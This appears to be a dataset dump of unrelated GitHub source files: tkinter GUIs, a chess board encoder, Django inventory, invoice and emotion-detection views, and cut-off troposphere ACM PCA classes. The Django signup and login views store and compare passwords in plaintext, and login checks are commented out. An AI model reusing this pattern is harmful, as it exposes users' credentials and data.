When a button is placed in root, it is placed in the window\nroot = Tk() # creates new window using tkinter\nroot.geometry('800x600') # the size of the window\nroot.title('Transcribing Program') # the name of the window\nroot.resizable(False, False) # prevents the user from resizing the window\n\ncanvas = Canvas(width = 900, height = 700)\n\nbck_image = Image.open(str(cur_directory + '/BlurryBackground.jpeg')) # creates an image file\ncopy_bck_image = bck_image.copy() # copies the files, bc original file is deleted after being used\nnew_bck = bck_image.resize((900,700))\nbck_fill = ImageTk.PhotoImage(bck_image) # turns the image into a format tkinter can use\n\n# places the blurry background image on the canvas to serve as a background\ncanvas.create_image(400, 300, image = bck_fill, anchor = CENTER)\n\nfront_image = Image.open(str(cur_directory + '/button.png')) #finds the button picture\ncopy_f_image = front_image.copy() # creates a copy of button picture to replace original if\n # something gets deleted\nnew_image = front_image.resize((180,240)) # resizes the image so that it will fit in the canvas\nfront_fill = ImageTk.PhotoImage(new_image) # converts the image into a format tkinter can use\n\ncanvas.create_image(400, 300, image = front_fill) # adds a box in front of background to\n # hold program options\ncanvas.pack(fill = BOTH) # fills both left and right side of parent widget(root)\n\n# creates a label that will be placed on canvas\noption_intro = Label(canvas, bg = '#2A2661', fg = 'pink', font = ('Times New Roman', 16),\n text = 'Program Options')\noption_intro.pack() # places the label on the canvas\n\n# places the option label on the canvas without chaninging the canvas's size\ncanvas.create_window(400, 200, anchor = CENTER, window = option_intro)\n\n# creates the button that will ask the user for an upload\nbtn = Button(text ='Upload Files', command = lambda:run_conversion())\nbtn.pack(pady = 10, side = BOTTOM)\n # moves the button down 10 units and places it on the bottom of the parent widget\n\n# creates a window on canvas and adds the button to it\ncanvas.create_window(400, 360, anchor = CENTER, window = btn)\n\n# a loop that will run continuously to check if the user clicked a button on the root panel\nroot.mainloop()\n","repo_name":"evelyn-needham/Voicelle","sub_path":"GUIConversionFOlder/GuiAndConversion.py","file_name":"GuiAndConversion.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2688851726","text":"import numpy as np\nimport chess\nimport pickle\nimport os\n\nNORMALIZE_MOBILITY = 64\nNORMALIZE_PIECE_NUMBER = 8\nNORMALIZE_50_MOVE_RULE = 50\nMAX_NB_MOVES = 500\n\nCHANNEL_PIECES = 0\nCHANNEL_REPETITION = 12\nCHANNEL_EN_PASSANT = 14\nCHANNEL_CASTLING = 15\nCHANNEL_NO_PROGRESS = 19\nCHANNEL_COLOR = 20\nCHANNEL_MOVE_NR = 21\nCHANNEL_LAST_MOVES = 22\n\nNB_CHANNELS_TOTAL = 24\nNB_LAST_MOVES = 1\n\n\ndef get_row_col(position, mirror=False):\n \"\"\"\n Maps a value [0,63] to its row and column index\n :param position: Position id which is an integer [0,63]\n :param mirror: Returns the indices for the mirrored board\n :return: Row and columns index\n \"\"\"\n # returns the column and row index of a given position\n row = position // 8\n col = position % 8\n\n if mirror:\n row = 7 - row\n\n return row, col\n\n\ndef board_to_planes(board: chess.Board, board_occ=0, normalize=False, last_moves=None):\n \"\"\"\n 5 planes\n * * *\n\n Total: 22 planes\n :param board: Board 
handle (Python-chess object)\n :param board_occ: Number of board occurrences\n :param normalize: True if the inputs shall be normalized to the range [0.-1.]\n :param last_moves:\n :return: planes - the plane representation of the current board state\n \"\"\"\n\n # return the plane representation of the given board\n # return variants.board_to_planes(board, board_occ, normalize, mode=MODE_CHESS)\n planes = np.zeros((24, 8, 8)).astype(int)\n\n # channel will be incremented by 1 at first plane\n channel = 0\n me = board.turn\n you = not board.turn\n colors = [me, you]\n\n # mirror all bitboard entries for the black player\n mirror = board.turn == chess.BLACK\n\n assert channel == CHANNEL_PIECES\n # Fill in the piece positions\n # Channel: 0 - 11\n # Iterate over both color starting with WHITE\n for color in colors:\n # the PIECE_TYPE is an integer list in python-chess\n for piece_type in chess.PIECE_TYPES:\n # iterate over the piece mask and receive every position square of it\n for pos in board.pieces(piece_type, color):\n row, col = get_row_col(pos, mirror=mirror)\n # set the bit at the right position\n planes[channel, row, col] = 1\n channel += 1\n\n assert channel == CHANNEL_REPETITION\n # Channel: 12 - 13\n # set how often the position has already occurred in the game (default 0 times)\n # this is used to check for claiming the 3-fold repetition rule\n if board_occ >= 1:\n planes[channel, :, :] = 1\n if board_occ >= 2:\n planes[channel + 1, :, :] = 1\n channel += 2\n\n # Channel: 14\n # En Passant Square\n assert channel == CHANNEL_EN_PASSANT\n if board.ep_square and board.has_legal_en_passant(): # is not None:\n row, col = get_row_col(board.ep_square, mirror=mirror)\n planes[channel, row, col] = 1\n channel += 1\n\n # Channel: 15 - 18\n assert channel == CHANNEL_CASTLING\n for color in colors:\n # check for King Side Castling\n if board.has_kingside_castling_rights(color):\n planes[channel, :, :] = 1\n channel += 1\n # check for Queen Side Castling\n if board.has_queenside_castling_rights(color):\n planes[channel, :, :] = 1\n channel += 1\n\n # Channel: 19\n # (IV.4) No Progress Count\n # define a no 'progress' counter\n # it gets incremented by 1 each move\n # however, whenever a piece gets dropped, a piece is captured or a pawn is moved, it is reset to 0\n # half-move_clock is an official metric in fen notation\n # -> see: https://en.wikipedia.org/wiki/Forsyth%E2%80%93Edwards_Notation\n # check how often the position has already occurred in the game\n assert channel == CHANNEL_NO_PROGRESS\n planes[channel, :, :] = board.halfmove_clock / NORMALIZE_50_MOVE_RULE if normalize else board.halfmove_clock\n channel += 1\n\n assert channel == CHANNEL_COLOR\n # (IV.1) Color\n if board.turn == chess.WHITE:\n planes[channel, :, :] = 1\n # otherwise the mat will remain zero\n channel += 1\n\n assert channel == CHANNEL_MOVE_NR\n planes[channel, :, :] = board.fullmove_number / MAX_NB_MOVES if normalize else board.fullmove_number\n channel += 1\n\n # Channel: 22 - 23\n assert channel == CHANNEL_LAST_MOVES\n # Last move\n if last_moves:\n assert (len(last_moves) == NB_LAST_MOVES)\n for move in last_moves:\n if move:\n from_row, from_col = get_row_col(move.from_square, mirror=mirror)\n to_row, to_col = get_row_col(move.to_square, mirror=mirror)\n planes[channel, from_row, from_col] = 1\n channel += 1\n planes[channel, to_row, to_col] = 1\n channel += 1\n else:\n channel += 2\n else:\n channel += NB_LAST_MOVES * 2\n\n assert channel == NB_CHANNELS_TOTAL\n\n return planes\n\n\ndef 
save_as_pickle(directory, filename, data):\n completeName = os.path.join(directory, filename)\n with open(completeName, 'wb') as output:\n pickle.dump(data, output)\n\n\ndef load_pickle(directory, filename):\n completeName = os.path.join(directory, filename)\n with open(completeName, 'rb') as pkl_file:\n data = pickle.load(pkl_file)\n return data\n","repo_name":"Migga98/MultimodalLearningChess","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"14879232328","text":"from django.shortcuts import render,redirect\nfrom django.http import HttpResponse\nimport csv\nfrom .models import *\nfrom .forms import *\nfrom django.contrib import messages\n# from django.contrib.auth.decorators import login_required\nfrom django.template.loader import get_template\nfrom xhtml2pdf import pisa\nimport pdfkit\nfrom io import BytesIO\n\n\n# Create your views here.\n\ndef home(request):\n title = 'Welcome to the Invoice & Stock management '\n context = {\n \"title\": title,\n }\n # return redirect('/list_items')\n return render(request, \"home.html\",context)\n\n#@login_required\ndef list_view(request):\n header = 'List of items'\n form = StockSearchForm(request.POST or None)\n queryset=Stock.objects.all()\n context = {\n \"header\": header,\n \"queryset\":queryset,\n \"form\": form,\n\n }\n if request.method == 'POST':\n category = form['category'].value()\n \n queryset = Stock.objects.filter(\n item_name__icontains=form['item_name'].value(),\n price__icontains=form['price'].value()\n )\n if (category != ''):\n queryset = queryset.filter(category_id=category)\n\n if form['export_to_CSV'].value() == True:\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=\"List of stock.csv\"'\n writer = csv.writer(response)\n writer.writerow(['CATEGORY', 'ITEM NAME', 'QUANTITY','PRICE'])\n instance = queryset\n for stock in instance:\n writer.writerow([stock.category, stock.item_name, stock.quantity,stock.price])\n return response\n\n context = {\n \"form\": form,\n \"header\": header,\n \"queryset\": queryset,}\n return render(request, \"list_item.html\",context)\n\n#@login_required\ndef add_items(request):\n form = StockCreateForm(request.POST or None)\n if form.is_valid():\n form.save()\n messages.success(request, 'Successfully Saved')\n return redirect('/list_items')\n context = {\n \"form\": form,\n \"title\": \"Add Item\",\n }\n return render(request, \"add_items.html\", context)\n\n#@login_required\ndef update_items(request, pk):\n queryset = Stock.objects.get(id=pk)\n form = StockUpdateForm(instance=queryset)\n if request.method == 'POST':\n form = StockUpdateForm(request.POST, instance=queryset)\n if form.is_valid():\n form.save()\n messages.success(request, 'Successfully Updated')\n return redirect('/list_items')\n context = {\n 'form':form,\n 'title':\"Update Item\"\n }\n return render(request, 'add_items.html', context)\n\n#@login_required\ndef delete_items(request, pk):\n queryset = Stock.objects.get(id=pk)\n if request.method == 'POST':\n queryset.delete()\n messages.success(request, 'Successfully Deleted')\n return redirect('/list_items')\n return render(request, 'delete_items.html')\n#@login_required\ndef stock_detail(request, pk):\n\tqueryset = Stock.objects.get(id=pk)\n\tcontext = {\n\t\t\"queryset\": queryset,\n\t}\n\treturn render(request, \"stock_details.html\", context)\n\n#@login_required\ndef 
issue_items(request, pk):\n queryset = Stock.objects.get(id=pk)\n form = IssueForm(request.POST or None, instance=queryset)\n if form.is_valid():\n instance = form.save(commit=False)\n # instance.receive_quantity = 0\n instance.quantity -= instance.issue_quantity\n instance.issue_by = str(request.user)\n messages.success(request, \"Issued SUCCESSFULLY. \" + str(instance.quantity) + \" \" + str(instance.item_name) + \"s now left in Store\")\n instance.save()\n issue_history = StockHistory(\n # id = instance.id, \n last_updated = instance.last_updated,\n category_id = instance.category_id,\n item_name = instance.item_name, \n quantity = instance.quantity, \n issue_to = instance.issue_to, \n issue_by = instance.issue_by, \n issue_quantity = instance.issue_quantity, \n )\n issue_history.save()\n return redirect('/stock_detail/'+str(instance.id))\n # return HttpResponseRedirect(instance.get_absolute_url())\n\n context = {\n \"title\": 'Issue ' + str(queryset.item_name),\n \"queryset\": queryset,\n \"form\": form,\n \"username\": 'Issue By: ' + str(request.user),\n }\n return render(request, \"add_items.html\", context)\n\n\n#@login_required\ndef receive_items(request, pk):\n queryset = Stock.objects.get(id=pk)\n form = ReceiveForm(request.POST or None, instance=queryset)\n if form.is_valid():\n instance = form.save(commit=False)\n # instance.issue_quantity = 0\n instance.quantity += instance.receive_quantity\n instance.receive_by = str(request.user)\n instance.save()\n receive_history = StockHistory(\n # id = instance.id, \n last_updated = instance.last_updated,\n category_id = instance.category_id,\n item_name = instance.item_name, \n quantity = instance.quantity, \n price = instance.price,\n receive_quantity = instance.receive_quantity, \n receive_by = instance.receive_by\n )\n receive_history.save()\n messages.success(request, \"Received SUCCESSFULLY. 
\" + str(instance.quantity) + \" \" + str(instance.item_name)+\"s now in Store\")\n\n return redirect('/stock_detail/'+str(instance.id))\n # return HttpResponseRedirect(instance.get_absolute_url())\n context = {\n \"title\": 'Reaceive ' + str(queryset.item_name),\n \"instance\": queryset,\n \"form\": form,\n \"username\": 'Receive By: ' + str(request.user),\n }\n return render(request, \"add_items.html\", context)\n\n#@login_required\ndef reorder_level(request, pk):\n\tqueryset = Stock.objects.get(id=pk)\n\tform = ReorderLevelForm(request.POST or None, instance=queryset)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\t\tmessages.success(request, \"Reorder level for \" + str(instance.item_name) + \" is updated to \" + str(instance.reorder_level))\n\n\t\treturn redirect(\"/list_items\")\n\tcontext = {\n\t\t\t\"instance\": queryset,\n\t\t\t\"form\": form,\n\t\t}\n\treturn render(request, \"add_items.html\", context)\n\n\n#@login_required\ndef list_history(request):\n header = 'HISTORY OF ITEMS'\n queryset = StockHistory.objects.all()\n form = StockHistorySearchForm(request.POST or None)\n context = {\n \"header\": header,\n \"form\": form,\n \"queryset\": queryset,\n }\n if request.method == 'POST':\n category = form['category'].value()\n queryset = StockHistory.objects.filter(\n item_name__icontains=form['item_name'].value(),\n last_updated__range=[\n form['start_date'].value(),\n form['end_date'].value()\n ]\n )\n\n if (category != ''):\n queryset = queryset.filter(category_id=category)\n\n if form['export_to_CSV'].value() == True:\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=\"Stock History.csv\"'\n writer = csv.writer(response)\n writer.writerow(\n ['CATEGORY', \n 'ITEM NAME',\n 'QUANTITY', \n 'PRICE',\n 'ISSUE QUANTITY', \n 'RECEIVE QUANTITY', \n 'RECEIVE BY', \n 'ISSUE BY', \n 'LAST UPDATED'])\n instance = queryset\n for stock in instance:\n writer.writerow(\n [stock.category, \n stock.item_name, \n stock.quantity, \n stock.price,\n stock.issue_quantity, \n stock.receive_quantity, \n stock.receive_by, \n stock.issue_by, \n stock.last_updated])\n return response\n\n context = {\n \"form\": form,\n \"header\": header,\n \"queryset\": queryset,\n }\n return render(request, \"list_history.html\",context)\n\n\ndef add_category(request):\n\tform = CategoryCreateForm(request.POST or None)\n\tif form.is_valid():\n\t\tform.save()\n\t\tmessages.success(request, 'Successfully Created')\n\t\treturn redirect('/list_items')\n\tcontext = {\n\t\t\"form\": form,\n\t\t\"title\": \"Add Category\",\n\t}\n\treturn render(request, \"add_items.html\", context)\n\n\ndef CustomerFormView(request):\n form=CustomerForm(request.POST or None)\n if form.is_valid():\n cust = CustomerDetails()\n cust.cust_name = request.POST['cust_name']\n cust.contact_num = request.POST['contact_num']\n cust.email = request.POST['email']\n cust.address = request.POST['address']\n cust.address_2 = request.POST['address_2']\n cust.landmark = request.POST['landmark']\n cust.country = request.POST['country']\n cust.state = request.POST['state']\n cust.city = request.POST['city']\n cust.pincode = request.POST['pincode']\n cust.save()\n return redirect('customer_form')\n return render(request,'customerform.html',{'form':form})\n\ndef CustomerView(request):\n model = CustomerDetails.objects.all()\n header=\"Customer\"\n return render(request,'customer.html',{'model':model,'header':header})\n\n\n#@login_required\ndef 
delete_Customer(request, pk):\n queryset = CustomerDetails.objects.get(id=pk)\n if request.method == 'POST':\n queryset.delete()\n messages.success(request, 'Successfully Deleted')\n return redirect('/customer_view')\n return render(request, 'delete_customer.html')\n\n\ndef update_customer(request, pk):\n queryset = CustomerDetails.objects.get(id=pk)\n form = CustomerUpdateForm(instance=queryset)\n if request.method == 'POST':\n form = CustomerUpdateForm(request.POST, instance=queryset)\n if form.is_valid():\n form.save()\n messages.success(request, 'Successfully Updated')\n return redirect('/customer_view')\n context = {\n 'form':form,\n 'title':\"Update Customer details\"\n }\n return render(request, 'customerform.html', context)\n\n\ndef add_invoice(request):\n cust = CustomerDetails.objects.all()\n form = invoiceForm(request.POST or None)\n if form.is_valid():\n form.save()\n return redirect('/customer_view')\n context = {\n 'form':form,\n 'title':\"Add Invoice\",\n 'cust':cust,\n }\n return render(request, 'Invoice.html', context)\n\n\ndef ProductForm(request):\n invo = Invoice_Details.objects.all()\n stock = Stock.objects.all()\n if request.POST:\n prod = Product()\n prod.Invoice = Invoice_Details.objects.get(Invoice_num=request.POST['Invoice'])\n prod.Product_name = request.POST['Product_name']\n prod.Qty = request.POST['Qty']\n prod.Price = request.POST['Price']\n prod.Discount = request.POST['Discount']\n prod.Cgst = request.POST['Cgst']\n prod.Sgst = request.POST['Sgst']\n prod.Igst = request.POST['Igst']\n prod.Total = request.POST['Total']\n prod.disc_rs = request.POST['disc_rs']\n prod.save()\n messages.success(request, 'Successfully added')\n return redirect('/productform/')\n return render(request,'productform.html',{'invo':invo,'stock':stock})\n\n\n\n\ndef InvoicePage(request,id):\n cust_data = CustomerDetails.objects.get(id=id)\n in_data = Invoice_Details.objects.filter(Cust_name=cust_data)\n invo = []\n pro = []\n pro_tot = []\n \n for i in in_data:\n print(i)\n invo.append(i)\n pro_count = Product.objects.filter(Invoice=i).count()\n print(pro_count)\n pro.append(pro_count)\n t = 0\n pro_data = Product.objects.filter(Invoice=i)\n for i in pro_data:\n t += float(i.Total)\n pro_tot.append(t)\n \n \n data = zip(invo,pro,pro_tot)\n request.session['pro_tot'] = t\n return render(request,'invoice_list.html',{'cust':cust_data,'invo':data})\n \n\ndef view_Invoice(request,id):\n in_data = Invoice_Details.objects.get(Invoice_num=id)\n prod=Product.objects.filter(Invoice=in_data)\n t=0\n list=[]\n for i in prod:\n t+=float(i.Total)\n list.append(i)\n print(list,t)\n data = {\"rec\":in_data,'prod':list,'pr':prod,'pro_tot':t}\n return render(request,'viewinvoice.html',data)\n\n\ndef render_to_pdf(template_src, context_dict={}):\n template = get_template(template_src)\n html = template.render(context_dict)\n result = BytesIO()\n pdf = pisa.pisaDocument(BytesIO(html.encode(\"ISO-8859-1\")), result)\n if not pdf.err:\n return HttpResponse(result.getvalue(), content_type='application/pdf')\n return None\n\ndef Shop_PDF(request,id):\n in_data = Invoice_Details.objects.get(Invoice_num=id)\n prod=Product.objects.filter(Invoice=in_data)\n t=0\n list=[]\n for i in prod:\n t+=float(i.Total)\n list.append(i)\n print(list,t)\n # pro_tot=request.session['pro_tot']\n data = {\"rec\":in_data,'prod':list,'pr':prod,'pro_tot':t}\n pdf = render_to_pdf('GeneratePdf.html', data)\n return HttpResponse(pdf, content_type='application/pdf')\n\n\ndef InvoiceDelete(request,invo_del):\n data = 
Invoice_Details.objects.get(Invoice_num=invo_del)\n data.delete()\n return redirect('customer_view')\n\n\n\n\ndef signup(request):\n form=userForm(request.POST or None)\n users=UserDetails.objects.all()\n if request.POST:\n model=UserDetails()\n model.name=request.POST['name']\n model.email=request.POST['email']\n model.phone=request.POST['phone']\n model.user_id=request.POST['user_id']\n model.password_1=request.POST['password_1']\n model.password_2=request.POST['password_2']\n for i in users:\n if(model.email== i.email):\n messages.error(request,'Email already Registered')\n return redirect (\"signup\") \n else:\n model.save() \n return redirect(\"login\")\n return render(request,\"signup.html\",{'form':form})\n\n\n\ndef login(request):\n if request.POST:\n # try:\n user_id=request.POST['user_id']\n Password=request.POST['Password']\n obj=UserDetails.objects.get(user_id=user_id)\n if obj.password_1==Password:\n return redirect('list_items')\n else:\n messages.error(request,'Wrong Password')\n return redirect('login')\n \n # except:\n # return HttpResponse('No user')\n return render(request,'login.html')","repo_name":"lunatic9824/Invoice-stock_Management","sub_path":"src/stockmanagement/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28411094327","text":"import tkinter\nimport time\n\ndef board_coord(x):\n return 30 + 40*x\n\nclass ChessView:\n root = tkinter.Tk()\n root.title(\"Chinese Chess\")\n root.resizable(0, 0)\n can = tkinter.Canvas(root, width=373, height=410)\n can.pack(expand=tkinter.YES, fill=tkinter.BOTH)\n img = tkinter.PhotoImage(file=\"images/WHITE.gif\")\n can.create_image(0, 0, image=img, anchor=tkinter.NW)\n piece_images = dict()\n move_images = []\n def draw_board(self, board):\n self.piece_images.clear()\n self.move_images = []\n pieces = board.pieces\n for (x, y) in pieces.keys():\n self.piece_images[x, y] = tkinter.PhotoImage(file=pieces[x, y].get_image_file_name())\n self.can.create_image(board_coord(x), board_coord(y), image=self.piece_images[x, y])\n if board.selected_piece:\n for (x, y) in board.selected_piece.get_move_locs(board):\n self.move_images.append(tkinter.PhotoImage(file=\"images/OOS.gif\"))\n self.can.create_image(board_coord(x), board_coord(y), image=self.move_images[-1])\n # self.can.create_text(board_coord(x), board_coord(y),text=\"Hello\")\n\n # label = tkinter.Label(self.root, text='Hello world!')\n # label.place(x=30,y=30)\n # label.pack(fill='x', expand=1)\n\n def disp_hint_on_board(self, action, percentage):\n board = self.board\n for key in board.pieces.keys():\n board.pieces[key].selected = False\n board.selected_piece = None\n\n self.can.create_image(0, 0, image=self.img, anchor=tkinter.NW)\n self.draw_board(board)\n # self.can.create_text(board_coord(self.last_text_x), board_coord(self.last_text_y), text=\"\")\n x_trans = {'a': 0, 'b': 1, 'c': 2, 'd': 3, 'e': 4, 'f': 5, 'g': 6, 'h': 7, 'i': 8}\n\n src = action[0:2]\n dst = action[2:4]\n\n src_x = int(x_trans[src[0]])\n src_y = int(src[1])\n\n dst_x = int(x_trans[dst[0]])\n dst_y = int(dst[1])\n\n pieces = board.pieces\n if (src_x, src_y) in pieces.keys():\n self.piece_images[src_x, src_y] = tkinter.PhotoImage(file=pieces[src_x, src_y].get_selected_image())\n self.can.create_image(board_coord(src_x), board_coord(src_y), image=self.piece_images[src_x, src_y])\n\n if (dst_x, dst_y) in pieces.keys():\n self.piece_images[dst_x, dst_y] = 
tkinter.PhotoImage(file=pieces[dst_x, dst_y].get_selected_image())\n self.can.create_image(board_coord(dst_x), board_coord(dst_y), image=self.piece_images[dst_x, dst_y])\n self.can.create_text(board_coord(dst_x), board_coord(dst_y), text=\"{:.3f}\".format(percentage))\n self.last_text_x = dst_x\n self.last_text_y = dst_y\n else:\n self.move_images.append(tkinter.PhotoImage(file=\"images/OOS.gif\"))\n self.can.create_image(board_coord(dst_x), board_coord(dst_y), image=self.move_images[-1])\n self.can.create_text(board_coord(dst_x), board_coord(dst_y),text=\"{:.3f}\".format(percentage))\n self.last_text_x = dst_x\n self.last_text_y = dst_y\n self.print_text_flag = True\n # return (src_x, src_y, dst_x - src_x, dst_y - src_y), win_rate\n\n def print_all_hint(self, sorted_move_probs):\n\n # for i in range(len(sorted_move_probs)):\n # self.lb.insert(END, str(i * 100))\n\n self.lb.delete(0, \"end\")\n for item in sorted_move_probs:\n # print(item[0], item[1])\n self.lb.insert(\"end\", item)\n self.lb.pack()\n\n def showMsg(self, msg):\n print(msg)\n self.root.title(msg)\n\n def printList(self, event):\n # print(self.lb.curselection())\n # print(self.lb.get(self.lb.curselection()))\n # for i in range(self.lb.size()):\n # print(i, self.lb.selection_includes(i))\n w = event.widget\n index = int(w.curselection()[0])\n value = w.get(index)\n print(value)\n self.disp_hint_on_board(value[0], value[1])\n\n\n def __init__(self, control, board):\n self.control = control\n if self.control.game_mode != 2:\n self.can.bind('', self.control.callback)\n\n self.lb = tkinter.Listbox(ChessView.root,selectmode=\"browse\")\n self.scr1 = tkinter.Scrollbar(ChessView.root)\n self.lb.configure(yscrollcommand=self.scr1.set)\n self.scr1['command'] = self.lb.yview\n self.scr1.pack(side='right',fill=\"y\")\n self.lb.pack(fill=\"x\")\n\n self.lb.bind('<>', self.printList) # Double- \n self.board = board\n self.last_text_x = 0\n self.last_text_y = 0\n self.print_text_flag = False\n\n # def start(self):\n # tkinter.mainloop()\n def start(self):\n if self.control.game_mode == 2:\n self.root.update()\n time.sleep(self.control.delay)\n while True:\n game_end = self.control.game_mode_2()\n self.root.update()\n time.sleep(self.control.delay)\n if game_end:\n time.sleep(self.control.end_delay)\n self.quit()\n return\n else:\n tkinter.mainloop()\n # self.root.mainloop()\n\n # below added by Fei Li\n\n def quit(self):\n self.root.quit()\n","repo_name":"chengstone/cchess-zero","sub_path":"ChessView.py","file_name":"ChessView.py","file_ext":"py","file_size_in_byte":5346,"program_lang":"python","lang":"en","doc_type":"code","stars":435,"dataset":"github-code","pt":"19"} +{"seq_id":"4251639506","text":"from django.shortcuts import render\nfrom django.core.files.storage import FileSystemStorage\nimport os\nfrom .emotion_detection import *\nfrom django.conf import settings\n# Create your views here.\n\nvgg16Loaded = loadModel(\"vgg16_end\")\nvgg19Loaded = loadModel(\"vgg19_end\")\nresNetLoaded = loadModel(\"resNet_end\")\nconv2DLoaded = loadModel(\"conv2D_end\")\n\n\n \ndef index(request):\n\n \n if request.method == \"POST\" and request.FILES['myfile']:\n myfile = request.FILES['myfile']\n fs = FileSystemStorage()\n filename = fs.save(myfile.name, myfile)\n uploaded_file_url = fs.url(filename)\n img = \"detectEmotion/images/happy.png\"\n resizedImage = resizeImage(settings.MEDIA_ROOT + \"/\" + filename)\n \n \n \n vgg16Result = predictOnImage(vgg16Loaded,resizedImage)\n vgg19Result = predictOnImage(vgg19Loaded,resizedImage)\n resNetResult = 
predictOnImage(resNetLoaded,resizedImage)\n conv2DResult = predictOnImage(conv2DLoaded,resizedImage)\n emotions = [\"neutral\", \"anger\",\"contempt\", \"disgust\",\"fear\",\"happiness\",\"sadness\",\"surprise\"]\n\n vgg16zip = zip(emotions,vgg16Result)\n vgg19zip = zip(emotions,vgg19Result)\n resNetzip = zip(emotions,resNetResult)\n ourModelzip = zip(emotions,conv2DResult)\n \n context = {'uploaded_file_url': uploaded_file_url, 'vgg16': vgg16zip,\"vgg19\": vgg19zip, \"resNet\": resNetzip,\"conv2D\": ourModelzip}\n \n return render(request, 'detectEmotion/show_emotion.html',context) \n \n clear_media_folder()\n \n return render(request, 'detectEmotion/index.html')\n\n\ndef show_emotion(request):\n return render(request, 'detectEmotion/show_emotion.html')\n\n\n\ndef clear_media_folder():\n folder = \"media/\"\n for f in os.listdir(folder):\n file_path = os.path.join(folder,f)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n except Exception as e:\n print(e)\n","repo_name":"mpreyes/emotion_research_frontend","sub_path":"detectEmotion/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21694694264","text":"from . import AWSObject, AWSProperty, Tags\nfrom .validators import (boolean, integer)\n\nVALID_SIGNIN_ALGORITHM = ('SHA256WITHECDSA', 'SHA256WITHRSA',\n 'SHA384WITHECDSA', 'SHA384WITHRSA',\n 'SHA512WITHECDSA', 'SHA512WITHRSA')\nVALID_VALIDITY_TYPE = ('ABSOLUTE', 'DAYS', 'END_DATE',\n 'MONTHS', 'YEARS')\nVALID_KEY_ALGORITHM = ('EC_prime256v1', 'EC_secp384r1',\n 'RSA_2048', 'RSA_4096')\nVALID_CERTIFICATEAUTHORITY_TYPE = ('ROOT', 'SUBORDINATE')\n\n\ndef validate_validity_type(validity_type):\n \"\"\"Certificate Validity Type validation rule.\"\"\"\n if validity_type not in VALID_VALIDITY_TYPE:\n raise ValueError(\"Certificate Validity Type must be one of: %s\" %\n \", \".join(VALID_VALIDITY_TYPE))\n return validity_type\n\n\ndef validate_signing_algorithm(signing_algorithm):\n \"\"\"Certificate SigningAlgorithm validation rule.\"\"\"\n if signing_algorithm not in VALID_SIGNIN_ALGORITHM:\n raise ValueError(\"Certificate SigningAlgorithm must be one of: %s\" %\n \", \".join(VALID_SIGNIN_ALGORITHM))\n return signing_algorithm\n\n\ndef validate_key_algorithm(key_algorithm):\n \"\"\"CertificateAuthority KeyAlgorithm validation rule.\"\"\"\n if key_algorithm not in VALID_KEY_ALGORITHM:\n raise ValueError(\"CertificateAuthority KeyAlgorithm must be one of: %s\" % # NOQA\n \", \".join(VALID_KEY_ALGORITHM))\n return key_algorithm\n\n\ndef validate_certificateauthority_type(certificateauthority_type):\n \"\"\"CertificateAuthority Type validation rule.\"\"\"\n if certificateauthority_type not in VALID_CERTIFICATEAUTHORITY_TYPE:\n raise ValueError(\"CertificateAuthority Type must be one of: %s\" %\n \", \".join(VALID_CERTIFICATEAUTHORITY_TYPE))\n return certificateauthority_type\n\n\nclass Qualifier(AWSProperty):\n props = {\n 'CpsUri': (str, True),\n }\n\n\nclass PolicyQualifierInfo(AWSProperty):\n props = {\n 'PolicyQualifierId': (str, True),\n 'Qualifier': (Qualifier, True),\n }\n\n\nclass PolicyQualifierInfoList(AWSProperty):\n props = {\n 'PolicyQualifierInfoList': ([PolicyQualifierInfo], False),\n }\n\n\nclass PolicyInformation(AWSProperty):\n props = {\n 'CertPolicyId': (str, True),\n 'PolicyQualifiers': (PolicyQualifierInfoList, False),\n }\n\n\nclass CertificatePolicyList(AWSProperty):\n props = {\n 'CertificatePolicyList': ([PolicyInformation], 
False),\n }\n\n\nclass ExtendedKeyUsage(AWSProperty):\n props = {\n 'ExtendedKeyUsageObjectIdentifier': (str, False),\n 'ExtendedKeyUsageType': (str, False),\n }\n\n\nclass ExtendedKeyUsageList(AWSProperty):\n props = {\n 'ExtendedKeyUsageList': ([ExtendedKeyUsage], False),\n }\n\n\nclass EdiPartyName(AWSProperty):\n props = {\n 'NameAssigner': (str, True),\n 'PartyName': (str, True),\n }\n\n\nclass OtherName(AWSProperty):\n props = {\n 'TypeId': (str, True),\n 'Value': (str, True),\n }\n\n\nclass Subject(AWSProperty):\n props = {\n 'CommonName': (str, False),\n 'Country': (str, False),\n 'DistinguishedNameQualifier': (str, False),\n 'GenerationQualifier': (str, False),\n 'GivenName': (str, False),\n 'Initials': (str, False),\n 'Locality': (str, False),\n 'Organization': (str, False),\n 'OrganizationalUnit': (str, False),\n 'Pseudonym': (str, False),\n 'SerialNumber': (str, False),\n 'State': (str, False),\n 'Surname': (str, False),\n 'Title': (str, False),\n }\n\n\nclass GeneralName(AWSProperty):\n props = {\n 'DirectoryName': (Subject, False),\n 'DnsName': (str, False),\n 'EdiPartyName': (EdiPartyName, False),\n 'IpAddress': (str, False),\n 'OtherName': (OtherName, False),\n 'RegisteredId': (str, False),\n 'Rfc822Name': (str, False),\n 'UniformResourceIdentifier': (str, False),\n }\n\n\nclass GeneralNameList(AWSProperty):\n props = {\n 'GeneralNameList': ([GeneralName], False),\n }\n\n\nclass KeyUsage(AWSProperty):\n props = {\n 'CRLSign': (boolean, False),\n 'DataEncipherment': (boolean, False),\n 'DecipherOnly': (boolean, False),\n 'DigitalSignature': (boolean, False),\n 'EncipherOnly': (boolean, False),\n 'KeyAgreement': (boolean, False),\n 'KeyCertSign': (boolean, False),\n 'KeyEncipherment': (boolean, False),\n 'NonRepudiation': (boolean, False),\n }\n\n\nclass Extensions(AWSProperty):\n props = {\n 'CertificatePolicies': (CertificatePolicyList, False),\n 'ExtendedKeyUsage': (ExtendedKeyUsageList, False),\n 'KeyUsage': 